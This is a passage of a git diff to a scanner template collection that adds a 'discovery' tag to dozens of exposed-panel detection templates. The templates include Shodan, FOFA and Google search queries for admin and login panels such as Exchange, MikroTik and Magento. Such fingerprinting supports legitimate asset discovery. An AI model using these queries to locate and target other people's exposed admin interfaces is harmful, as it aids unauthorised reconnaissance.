b/http/exposed-panels/landrayoa-panel.yaml index 416ed44455f..be2a0065a0d 100644 --- a/http/exposed-panels/landrayoa-panel.yaml +++ b/http/exposed-panels/landrayoa-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,landrayoa + tags: panel,landrayoa,discovery http: - method: GET diff --git a/http/exposed-panels/lansweeper-login.yaml b/http/exposed-panels/lansweeper-login.yaml index cfd1afe838d..459e6ed2a1a 100644 --- a/http/exposed-panels/lansweeper-login.yaml +++ b/http/exposed-panels/lansweeper-login.yaml @@ -19,7 +19,7 @@ info: - http.title:"lansweeper - login" fofa-query: title="lansweeper - login" google-query: intitle:"lansweeper - login" - tags: lansweeper,tech,panel + tags: lansweeper,tech,panel,discovery http: - method: GET diff --git a/http/exposed-panels/lantronix-webmanager-panel.yaml b/http/exposed-panels/lantronix-webmanager-panel.yaml index 24111fc0689..56c80ab04ca 100644 --- a/http/exposed-panels/lantronix-webmanager-panel.yaml +++ b/http/exposed-panels/lantronix-webmanager-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,lantronix + tags: panel,lantronix,discovery http: - method: GET diff --git a/http/exposed-panels/laravel-filemanager.yaml b/http/exposed-panels/laravel-filemanager.yaml index 5cf6089804b..9c80a929e2c 100644 --- a/http/exposed-panels/laravel-filemanager.yaml +++ b/http/exposed-panels/laravel-filemanager.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,laravel,filemanager,fileupload,intrusive + tags: panel,laravel,filemanager,fileupload,intrusive,discovery http: - method: GET diff --git a/http/exposed-panels/ldap-account-manager-panel.yaml b/http/exposed-panels/ldap-account-manager-panel.yaml index fe6e132837b..81daaf6d9f0 100644 --- a/http/exposed-panels/ldap-account-manager-panel.yaml +++ b/http/exposed-panels/ldap-account-manager-panel.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"LDAP Account Manager" product: ldap_account_manager vendor: ldap-account-manager - tags: panel,ldap + tags: panel,ldap,discovery http: - method: GET diff --git a/http/exposed-panels/lenovo-fp-panel.yaml b/http/exposed-panels/lenovo-fp-panel.yaml index a5c857c6b4d..132b33484d2 100644 --- a/http/exposed-panels/lenovo-fp-panel.yaml +++ b/http/exposed-panels/lenovo-fp-panel.yaml @@ -18,7 +18,7 @@ info: - http.html:"Fan and Power Controller" - http.html:"fan and power controller" fofa-query: body="fan and power controller" - tags: panel,lenovo + tags: panel,lenovo,discovery http: - method: GET diff --git a/http/exposed-panels/lenovo-thinkserver-panel.yaml b/http/exposed-panels/lenovo-thinkserver-panel.yaml index fcf64c8e4ab..ce61a0abf1a 100644 --- a/http/exposed-panels/lenovo-thinkserver-panel.yaml +++ b/http/exposed-panels/lenovo-thinkserver-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,thinkserver,lenovo + tags: panel,thinkserver,lenovo,discovery http: - method: GET diff --git a/http/exposed-panels/leostream-panel.yaml b/http/exposed-panels/leostream-panel.yaml index 5912fe99e7f..efb2c880a09 100644 --- a/http/exposed-panels/leostream-panel.yaml +++ b/http/exposed-panels/leostream-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"Leostream" product: connection_broker vendor: leostream - tags: panel,leostream + tags: panel,leostream,discovery http: - method: GET diff --git a/http/exposed-panels/librenms-login.yaml b/http/exposed-panels/librenms-login.yaml index 7f9bd69f650..739fb06e389 100644 --- a/http/exposed-panels/librenms-login.yaml +++ b/http/exposed-panels/librenms-login.yaml @@ -14,7 +14,7 @@ info: vendor: librenms product: librenms fofa-query: title="librenms" - tags: librenms,panel + tags: librenms,panel,discovery http: - method: GET diff --git a/http/exposed-panels/librephotos-panel.yaml b/http/exposed-panels/librephotos-panel.yaml index 8bb4cb94131..c2d80bca9b1 100644 --- a/http/exposed-panels/librephotos-panel.yaml +++ b/http/exposed-panels/librephotos-panel.yaml @@ -14,7 +14,7 @@ info: vendor: librephotos_project product: librephotos shodan-query: title:"LibrePhotos" - tags: panel,librephotos,detect,login + tags: panel,librephotos,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/librespeed-panel.yaml b/http/exposed-panels/librespeed-panel.yaml index b6252730f86..c00f39bd98b 100644 --- a/http/exposed-panels/librespeed-panel.yaml +++ b/http/exposed-panels/librespeed-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"LibreSpeed" - tags: panel,librespeed,detect + tags: panel,librespeed,detect,discovery http: - method: GET diff --git a/http/exposed-panels/liferay-portal.yaml b/http/exposed-panels/liferay-portal.yaml index f319698aa7d..a1944864fa9 100644 --- a/http/exposed-panels/liferay-portal.yaml +++ b/http/exposed-panels/liferay-portal.yaml @@ -21,7 +21,7 @@ info: - http.favicon.hash:129457226 - cpe:"cpe:2.3:a:liferay:liferay_portal" fofa-query: icon_hash=129457226 - tags: panel,liferay,portal + tags: panel,liferay,portal,discovery http: - method: GET diff --git a/http/exposed-panels/linkerd-panel.yaml b/http/exposed-panels/linkerd-panel.yaml index 62df60527f9..2d486066203 100644 --- a/http/exposed-panels/linkerd-panel.yaml +++ b/http/exposed-panels/linkerd-panel.yaml @@ -19,7 +19,7 @@ info: - html:"data-controller-namespace" - http.html:"data-controller-namespace" fofa-query: body="data-controller-namespace" - tags: panel,misconfig,linkerd,exposure + tags: panel,misconfig,linkerd,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/linksys-wifi-login.yaml b/http/exposed-panels/linksys-wifi-login.yaml index 079a6897fdb..4381df3bc25 100644 --- a/http/exposed-panels/linksys-wifi-login.yaml +++ b/http/exposed-panels/linksys-wifi-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Linksys Smart WI-FI" - tags: tech,panel,linksys,iot + tags: tech,panel,linksys,iot,discovery http: - method: GET diff --git a/http/exposed-panels/linshare-panel.yaml b/http/exposed-panels/linshare-panel.yaml index cc4c7808d46..3db8984512f 100644 --- a/http/exposed-panels/linshare-panel.yaml +++ b/http/exposed-panels/linshare-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 3 shodan-query: http.title:"LinShare" - tags: panel,linshare,login,detect + tags: panel,linshare,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/livehelperchat-admin-panel.yaml b/http/exposed-panels/livehelperchat-admin-panel.yaml index 4355d36cb80..6d2555943ab 100644 --- a/http/exposed-panels/livehelperchat-admin-panel.yaml +++ b/http/exposed-panels/livehelperchat-admin-panel.yaml @@ -21,7 +21,7 @@ info: - title="Live Helper Chat" - title="live helper chat" google-query: intitle:"live helper chat" - tags: livehelperchat,panel + tags: livehelperchat,panel,discovery http: - method: GET diff --git a/http/exposed-panels/livezilla-login-panel.yaml b/http/exposed-panels/livezilla-login-panel.yaml index 07e422a402f..e71dc09f017 100644 --- a/http/exposed-panels/livezilla-login-panel.yaml +++ b/http/exposed-panels/livezilla-login-panel.yaml @@ -15,7 +15,7 @@ info: product: livezilla shodan-query: http.html:livezilla fofa-query: body=livezilla - tags: panel,livezilla,login + tags: panel,livezilla,login,discovery http: - method: GET diff --git a/http/exposed-panels/locklizard-webviewer-panel.yaml b/http/exposed-panels/locklizard-webviewer-panel.yaml index d48ec161883..afc2e4766ad 100644 --- a/http/exposed-panels/locklizard-webviewer-panel.yaml +++ b/http/exposed-panels/locklizard-webviewer-panel.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"Locklizard Web Viewer" - tags: panel,locklizard,webviewer + tags: panel,locklizard,webviewer,discovery http: - method: GET diff --git a/http/exposed-panels/lockself-panel.yaml b/http/exposed-panels/lockself-panel.yaml index 2e461daa1f6..27207720199 100644 --- a/http/exposed-panels/lockself-panel.yaml +++ b/http/exposed-panels/lockself-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"LockSelf" - tags: panel,lockself,login,detect + tags: panel,lockself,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/logitech-harmony-portal.yaml b/http/exposed-panels/logitech-harmony-portal.yaml index 60f55fd5598..e2ea53a0713 100644 --- a/http/exposed-panels/logitech-harmony-portal.yaml +++ b/http/exposed-panels/logitech-harmony-portal.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Logitech Harmony Pro Installer" - tags: panel,logitech,harmony,exposure + tags: panel,logitech,harmony,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/lomnido-panel.yaml b/http/exposed-panels/lomnido-panel.yaml index 8fc659b9c68..42016b89bbe 100644 --- a/http/exposed-panels/lomnido-panel.yaml +++ b/http/exposed-panels/lomnido-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Lomnido Login" - tags: lomnido,panel,login,detect + tags: lomnido,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/looker-panel.yaml b/http/exposed-panels/looker-panel.yaml index d8561d0787e..f401c83b4ec 100644 --- a/http/exposed-panels/looker-panel.yaml +++ b/http/exposed-panels/looker-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"lookerVersion" - tags: panel,login,looker + tags: panel,login,looker,discovery http: - method: GET diff --git a/http/exposed-panels/lorex-panel.yaml b/http/exposed-panels/lorex-panel.yaml index 0ade3d60fc6..e9563d04aff 100644 --- a/http/exposed-panels/lorex-panel.yaml +++ b/http/exposed-panels/lorex-panel.yaml @@ -1,34 +1,34 @@ -id: lorex-panel - -info: - name: Lorex Panel - Detect - author: rxerium - severity: info - description: | - A lorex panel was detected. - reference: - - https://www.lorex.com/ - classification: - cwe-id: CWE-200 - metadata: - verified: true - max-request: 1 - shodan-query: "Lorex" - tags: panel,login,detect,lorex - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains_all(tolower(body), "web service", "lorex")' - - 'contains_any(body, "/LOREX_webplugin", "lorex_msg")' +id: lorex-panel + +info: + name: Lorex Panel - Detect + author: rxerium + severity: info + description: | + A lorex panel was detected. + reference: + - https://www.lorex.com/ + classification: + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: "Lorex" + tags: panel,login,detect,lorex,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains_all(tolower(body), "web service", "lorex")' + - 'contains_any(body, "/LOREX_webplugin", "lorex_msg")' condition: or # digest: 4a0a00473045022100966dc2282962467626592a05c1b9a7af85f046c9f3114456bd0def2a1a039b44022060fc066fcf923346e32e215a5fbf245f175fa3163393a9623f9b4467010d61ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/loxone-panel.yaml b/http/exposed-panels/loxone-panel.yaml index d2154da9f0b..ac8bb005baf 100644 --- a/http/exposed-panels/loxone-panel.yaml +++ b/http/exposed-panels/loxone-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Loxone Intercom Video" - tags: panel,loxone + tags: panel,loxone,discovery http: - method: GET diff --git a/http/exposed-panels/loxone-web-panel.yaml b/http/exposed-panels/loxone-web-panel.yaml index 52bd7ab7c6e..dcb31179b74 100644 --- a/http/exposed-panels/loxone-web-panel.yaml +++ b/http/exposed-panels/loxone-web-panel.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: html:"Webinterface" - tags: panel,login,loxone,detect + tags: panel,login,loxone,detect,discovery http: - method: GET diff --git a/http/exposed-panels/lucee-login.yaml b/http/exposed-panels/lucee-login.yaml index 52f85cba1c6..6036be390fb 100644 --- a/http/exposed-panels/lucee-login.yaml +++ b/http/exposed-panels/lucee-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"Lucee" - tags: panel,lucee + tags: panel,lucee,discovery http: - method: GET diff --git a/http/exposed-panels/luci-login-detection.yaml b/http/exposed-panels/luci-login-detection.yaml index 4f347ce0727..65f43b2e951 100644 --- a/http/exposed-panels/luci-login-detection.yaml +++ b/http/exposed-panels/luci-login-detection.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,login + tags: panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/m-bus-panel.yaml b/http/exposed-panels/m-bus-panel.yaml index 785a2295532..b41dc70725f 100644 --- a/http/exposed-panels/m-bus-panel.yaml +++ b/http/exposed-panels/m-bus-panel.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"JC-e converter webinterface" - tags: panel,login,m-bus,detect + tags: panel,login,m-bus,detect,discovery http: - method: GET diff --git a/http/exposed-panels/mach-proweb-login.yaml b/http/exposed-panels/mach-proweb-login.yaml index 491194b9888..ea458c1c81d 100644 --- a/http/exposed-panels/mach-proweb-login.yaml +++ b/http/exposed-panels/mach-proweb-login.yaml @@ -18,7 +18,7 @@ info: google-query: intitle:"Log on to MACH-ProWeb" product: mach-prowebcom vendor: reliablecontrols - tags: panel,machproweb,edb + tags: panel,machproweb,edb,discovery http: - method: GET diff --git a/http/exposed-panels/machform-admin-panel.yaml b/http/exposed-panels/machform-admin-panel.yaml index a04ce08b736..087ab51e918 100644 --- a/http/exposed-panels/machform-admin-panel.yaml +++ b/http/exposed-panels/machform-admin-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"MachForm Admin Panel" product: machform vendor: machform - tags: panel,machform,admin + tags: panel,machform,admin,discovery http: - method: GET diff --git a/http/exposed-panels/macos-server-panel.yaml b/http/exposed-panels/macos-server-panel.yaml index 409cd93138b..d8e942d8ce0 100644 --- a/http/exposed-panels/macos-server-panel.yaml +++ b/http/exposed-panels/macos-server-panel.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"macOS Server" - tags: panel,login,macos-server,detect + tags: panel,login,macos-server,detect,discovery http: - method: GET diff --git a/http/exposed-panels/maestro-listserv-panel.yaml b/http/exposed-panels/maestro-listserv-panel.yaml index 77688f1681a..bc214be3da9 100644 --- a/http/exposed-panels/maestro-listserv-panel.yaml +++ b/http/exposed-panels/maestro-listserv-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"LISTSERV Maestro" - tags: panel,maestro,detect,login + tags: panel,maestro,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/maestro-login-panel.yaml b/http/exposed-panels/maestro-login-panel.yaml index 244e75f767f..12a1f7354d2 100644 --- a/http/exposed-panels/maestro-login-panel.yaml +++ b/http/exposed-panels/maestro-login-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Maestro - LuCI" - tags: panel,maestro,luci + tags: panel,maestro,luci,discovery http: - method: GET diff --git a/http/exposed-panels/mag-dashboard-panel.yaml b/http/exposed-panels/mag-dashboard-panel.yaml index 282f1523afa..93c4c2138f4 100644 --- a/http/exposed-panels/mag-dashboard-panel.yaml +++ b/http/exposed-panels/mag-dashboard-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"MAG Dashboard Login" - tags: panel,mag + tags: panel,mag,discovery http: - method: GET diff --git a/http/exposed-panels/magento-admin-panel.yaml b/http/exposed-panels/magento-admin-panel.yaml index 735f327afc1..ca73395cd98 100644 --- a/http/exposed-panels/magento-admin-panel.yaml +++ b/http/exposed-panels/magento-admin-panel.yaml @@ -21,7 +21,7 @@ info: - http.component:"Magento" - cpe:"cpe:2.3:a:magento:magento" - http.component:"magento" - tags: magento,panel + tags: magento,panel,discovery http: - method: GET diff --git a/http/exposed-panels/magento-downloader-panel.yaml b/http/exposed-panels/magento-downloader-panel.yaml index dc9fb7cf5c8..14314945740 100644 --- a/http/exposed-panels/magento-downloader-panel.yaml +++ b/http/exposed-panels/magento-downloader-panel.yaml @@ -20,7 +20,7 @@ info: - http.component:"Magento" - cpe:"cpe:2.3:a:magento:magento" - http.component:"magento" - tags: magento,exposure,panel + tags: magento,exposure,panel,discovery http: - method: GET diff --git a/http/exposed-panels/magicinfo-panel.yaml b/http/exposed-panels/magicinfo-panel.yaml index 892e8e95aad..43822d282fc 100644 --- a/http/exposed-panels/magicinfo-panel.yaml +++ b/http/exposed-panels/magicinfo-panel.yaml @@ -15,7 +15,7 @@ info: product: magicinfo shodan-query: title:"MagicINFO" fofa-query: title:"MagicINFO" - tags: panel,login,magicinfo,detect + tags: panel,login,magicinfo,detect,discovery http: - method: GET diff --git a/http/exposed-panels/magnolia-panel.yaml b/http/exposed-panels/magnolia-panel.yaml index e05a09fdfcc..f0c5e5d9392 100644 --- a/http/exposed-panels/magnolia-panel.yaml +++ b/http/exposed-panels/magnolia-panel.yaml @@ -18,7 +18,7 @@ info: shodan-query: html:"Magnolia is a registered trademark" product: magnolia_cms vendor: magnolia-cms - tags: magnolia,panel,login + tags: magnolia,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/mailhog-panel.yaml b/http/exposed-panels/mailhog-panel.yaml index 290a3ba17c8..3e9d2f25353 100644 --- a/http/exposed-panels/mailhog-panel.yaml +++ b/http/exposed-panels/mailhog-panel.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"mailhog" - tags: panel,mailhog,mail,smtp + tags: panel,mailhog,mail,smtp,discovery http: - method: GET diff --git a/http/exposed-panels/mailwatch-login.yaml b/http/exposed-panels/mailwatch-login.yaml index dc8eb2db718..3dbcb7ade2d 100644 --- a/http/exposed-panels/mailwatch-login.yaml +++ b/http/exposed-panels/mailwatch-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"MailWatch Login Page" - tags: panel,mailwatch + tags: panel,mailwatch,discovery http: - method: GET diff --git a/http/exposed-panels/maltrail-panel.yaml b/http/exposed-panels/maltrail-panel.yaml index 72262e38b5d..f0368afb709 100644 --- a/http/exposed-panels/maltrail-panel.yaml +++ b/http/exposed-panels/maltrail-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Maltrail" - tags: panel,maltrail,detect + tags: panel,maltrail,detect,discovery http: - method: GET diff --git a/http/exposed-panels/malwared-byob.yaml b/http/exposed-panels/malwared-byob.yaml index e4154a41479..d6fb51b5c29 100644 --- a/http/exposed-panels/malwared-byob.yaml +++ b/http/exposed-panels/malwared-byob.yaml @@ -11,7 +11,7 @@ info: metadata: shodan-query: http.favicon.hash:487145192 fofa-query: icon_hash="487145192" - tags: panel,malware,byob,botnet,oss,detect + tags: panel,malware,byob,botnet,oss,detect,discovery http: - method: GET diff --git a/http/exposed-panels/mantisbt-panel.yaml b/http/exposed-panels/mantisbt-panel.yaml index 66b0dcfcf7d..f2b9a1762d3 100644 --- a/http/exposed-panels/mantisbt-panel.yaml +++ b/http/exposed-panels/mantisbt-panel.yaml @@ -20,7 +20,7 @@ info: - http.favicon.hash:662709064 - cpe:"cpe:2.3:a:mantisbt:mantisbt" fofa-query: icon_hash=662709064 - tags: panel,mantisbt + tags: panel,mantisbt,discovery http: - method: GET diff --git a/http/exposed-panels/matomo-panel.yaml b/http/exposed-panels/matomo-panel.yaml index c85fc0c8d05..587f99d11f0 100644 --- a/http/exposed-panels/matomo-panel.yaml +++ b/http/exposed-panels/matomo-panel.yaml @@ -22,7 +22,7 @@ info: - "http.favicon.hash:-2023266783" - cpe:"cpe:2.3:a:matomo:matomo" fofa-query: icon_hash=-2023266783 - tags: panel,matomo,login,detect + tags: panel,matomo,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/mattermost-panel.yaml b/http/exposed-panels/mattermost-panel.yaml index d2819adda77..765ee493d19 100644 --- a/http/exposed-panels/mattermost-panel.yaml +++ b/http/exposed-panels/mattermost-panel.yaml @@ -12,7 +12,7 @@ info: shodan-query: html:'content="Mattermost"' fofa-query: 'content="Mattermost"' vendor: mattermost - tags: login,mattermost,panel + tags: login,mattermost,panel,discovery http: - method: GET diff --git a/http/exposed-panels/mautic-crm-panel.yaml b/http/exposed-panels/mautic-crm-panel.yaml index 5e80d546036..0678900b1b7 100644 --- a/http/exposed-panels/mautic-crm-panel.yaml +++ b/http/exposed-panels/mautic-crm-panel.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,mautic,crm,panel + tags: tech,mautic,crm,panel,discovery http: - method: GET diff --git a/http/exposed-panels/mbilling-panel.yaml b/http/exposed-panels/mbilling-panel.yaml index 6c1bb57eb41..7ad79ce1c16 100644 --- a/http/exposed-panels/mbilling-panel.yaml +++ b/http/exposed-panels/mbilling-panel.yaml @@ -10,7 +10,7 @@ info: shodan-query: html:"MagnusBilling" verified: true max-request: 1 - tags: mbilling,login,panel,magnusbilling + tags: mbilling,login,panel,magnusbilling,discovery http: - method: GET diff --git a/http/exposed-panels/meddream-dicom-viewer-panel.yaml b/http/exposed-panels/meddream-dicom-viewer-panel.yaml index 4d1e76ab317..5a0a5c24005 100644 --- a/http/exposed-panels/meddream-dicom-viewer-panel.yaml +++ b/http/exposed-panels/meddream-dicom-viewer-panel.yaml @@ -19,7 +19,7 @@ info: shodan-query: "Set-Cookie: MEDDREAMSESSID" fofa-query: "Set-Cookie: MEDDREAMSESSID" zoomeye-query: app:"MedDream" - tags: panel,meddream,detect + tags: panel,meddream,detect,discovery http: - method: GET diff --git a/http/exposed-panels/memos-panel.yaml b/http/exposed-panels/memos-panel.yaml index afe719e71eb..cd1e3422069 100644 --- a/http/exposed-panels/memos-panel.yaml +++ b/http/exposed-panels/memos-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"memos" fofa-query: title="memos" google-query: intitle:"memos" - tags: panel,memos,detect,usememos + tags: panel,memos,detect,usememos,discovery http: - method: GET diff --git a/http/exposed-panels/meshcentral-login.yaml b/http/exposed-panels/meshcentral-login.yaml index 6caae645d21..2a52ffd3be5 100644 --- a/http/exposed-panels/meshcentral-login.yaml +++ b/http/exposed-panels/meshcentral-login.yaml @@ -18,7 +18,7 @@ info: - http.title:"meshcentral - login" fofa-query: title="meshcentral - login" google-query: intitle:"meshcentral - login" - tags: panel,meshcentral + tags: panel,meshcentral,discovery http: - method: GET diff --git a/http/exposed-panels/metabase-panel.yaml b/http/exposed-panels/metabase-panel.yaml index c3fde9529e3..30deabaf213 100644 --- a/http/exposed-panels/metabase-panel.yaml +++ b/http/exposed-panels/metabase-panel.yaml @@ -20,7 +20,7 @@ info: - title="metabase" - app="metabase" google-query: intitle:"metabase" - tags: panel,metabase,login + tags: panel,metabase,login,discovery http: - method: GET diff --git a/http/exposed-panels/metasploit-panel.yaml b/http/exposed-panels/metasploit-panel.yaml index 9d0a51920d5..bc60c2d211a 100644 --- a/http/exposed-panels/metasploit-panel.yaml +++ b/http/exposed-panels/metasploit-panel.yaml @@ -25,7 +25,7 @@ info: google-query: - intitle:"metasploit" - intitle:"metasploit - setup and configuration" - tags: panel,metasploit,login,rapid7 + tags: panel,metasploit,login,rapid7,discovery http: - method: GET diff --git a/http/exposed-panels/metasploit-setup-page.yaml b/http/exposed-panels/metasploit-setup-page.yaml index de8bd0a4216..b83aef158df 100644 --- a/http/exposed-panels/metasploit-setup-page.yaml +++ b/http/exposed-panels/metasploit-setup-page.yaml @@ -25,7 +25,7 @@ info: google-query: - intitle:"metasploit" - intitle:"metasploit - setup and configuration" - tags: panel,metasploit,setup,rapid7 + tags: panel,metasploit,setup,rapid7,discovery http: - method: GET diff --git a/http/exposed-panels/metersphere-login.yaml b/http/exposed-panels/metersphere-login.yaml index 840b21ff5c9..b73795fb821 100644 --- a/http/exposed-panels/metersphere-login.yaml +++ b/http/exposed-panels/metersphere-login.yaml @@ -19,7 +19,7 @@ info: - body="metersphere" - title="metersphere" shodan-query: http.html:"metersphere" - tags: panel,metersphere + tags: panel,metersphere,discovery http: - method: GET diff --git a/http/exposed-panels/metube-panel.yaml b/http/exposed-panels/metube-panel.yaml index 788c8db5acc..b487b97a60c 100644 --- a/http/exposed-panels/metube-panel.yaml +++ b/http/exposed-panels/metube-panel.yaml @@ -1,32 +1,32 @@ -id: metube-detect - -info: - name: MeTube Instance Detected - author: rxerium - severity: info - description: | - A MeTube instance was detected. - reference: - - https://github.com/alexta69/metube - metadata: - verified: true - shodan-query: http.title:MeTube - max-request: 1 - tags: metube,detect,panel,login - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "MeTube" - - - type: status - status: +id: metube-detect + +info: + name: MeTube Instance Detected + author: rxerium + severity: info + description: | + A MeTube instance was detected. + reference: + - https://github.com/alexta69/metube + metadata: + verified: true + shodan-query: http.title:MeTube + max-request: 1 + tags: metube,detect,panel,login,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "MeTube" + + - type: status + status: - 200 # digest: 490a0046304402207352b002802c5b565a2d26c39c9096c8b9d154c8623b3cb33930e1c3b5b1f747022051e069e0302b7a90a2f61d5764dbbc3678095c74f502524c7639c907cb7710ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/mfiles-web-detect.yaml b/http/exposed-panels/mfiles-web-detect.yaml index 4f61af32e5b..bf54d941340 100644 --- a/http/exposed-panels/mfiles-web-detect.yaml +++ b/http/exposed-panels/mfiles-web-detect.yaml @@ -20,7 +20,7 @@ info: - http.html:"M-Files Web" - http.html:"m-files web" fofa-query: body="m-files web" - tags: panel,m-files + tags: panel,m-files,discovery http: - method: GET diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index 9362f461f12..d100a4f7931 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -17,7 +17,7 @@ info: shodan-query: - "Micro Focus DSD" - micro focus dsd - tags: panel,microfocus,detect,login + tags: panel,microfocus,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index 6d8c306e511..fe24ceb0881 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -18,7 +18,7 @@ info: - "http.html:\"Micro Focus Filr\"" - http.html:"micro focus filr" fofa-query: body="micro focus filr" - tags: panel,microfocus,filr,detect + tags: panel,microfocus,filr,detect,discovery http: - method: GET diff --git a/http/exposed-panels/microfocus-lifecycle-panel.yaml b/http/exposed-panels/microfocus-lifecycle-panel.yaml index 2c5f19d5e20..de3e4b06908 100644 --- a/http/exposed-panels/microfocus-lifecycle-panel.yaml +++ b/http/exposed-panels/microfocus-lifecycle-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Micro Focus Application Lifecycle Management" - tags: panel,microfocus,login,detect + tags: panel,microfocus,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/microfocus-vibe-panel.yaml b/http/exposed-panels/microfocus-vibe-panel.yaml index 3603a865c4b..de41fd73f6f 100644 --- a/http/exposed-panels/microfocus-vibe-panel.yaml +++ b/http/exposed-panels/microfocus-vibe-panel.yaml @@ -18,7 +18,7 @@ info: - http.html:"Micro Focus Vibe" - http.html:"micro focus vibe" fofa-query: body="micro focus vibe" - tags: panel,microfocus,vibe + tags: panel,microfocus,vibe,discovery http: - method: GET diff --git a/http/exposed-panels/microsoft-exchange-panel.yaml b/http/exposed-panels/microsoft-exchange-panel.yaml index 3c7752babcf..ac6c596adfe 100644 --- a/http/exposed-panels/microsoft-exchange-panel.yaml +++ b/http/exposed-panels/microsoft-exchange-panel.yaml @@ -23,7 +23,7 @@ info: - icon_hash=1768726119 - title="outlook" google-query: intitle:"outlook" - tags: microsoft,panel,exchange + tags: microsoft,panel,exchange,discovery http: - method: GET diff --git a/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml b/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml index b80d0646413..ffd0a47fe13 100644 --- a/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml +++ b/http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml @@ -19,7 +19,7 @@ info: - http.title:"mikrotik routeros > administration" fofa-query: title="mikrotik routeros > administration" google-query: intitle:"mikrotik routeros > administration" - tags: panel,login,mikrotik + tags: panel,login,mikrotik,discovery http: - method: GET diff --git a/http/exposed-panels/mikrotik/mikrotik-routeros.yaml b/http/exposed-panels/mikrotik/mikrotik-routeros.yaml index 74821adc481..b20ffb66d3b 100644 --- a/http/exposed-panels/mikrotik/mikrotik-routeros.yaml +++ b/http/exposed-panels/mikrotik/mikrotik-routeros.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.title:"mikrotik routeros > administration" fofa-query: title="mikrotik routeros > administration" google-query: intitle:"mikrotik routeros > administration" - tags: panel,login,mikrotik + tags: panel,login,mikrotik,discovery http: - method: GET diff --git a/http/exposed-panels/mini-start-page.yaml b/http/exposed-panels/mini-start-page.yaml index 7d77ad77579..fac6e1ae775 100644 --- a/http/exposed-panels/mini-start-page.yaml +++ b/http/exposed-panels/mini-start-page.yaml @@ -15,7 +15,7 @@ info: max-request: 2 vendor: miniweb_http_server_project product: miniweb_http_server - tags: edb,panel,miniweb_http_server_project + tags: edb,panel,miniweb_http_server_project,discovery http: - method: GET diff --git a/http/exposed-panels/minio-browser.yaml b/http/exposed-panels/minio-browser.yaml index 96edd369db0..985a22d6985 100644 --- a/http/exposed-panels/minio-browser.yaml +++ b/http/exposed-panels/minio-browser.yaml @@ -25,7 +25,7 @@ info: google-query: - 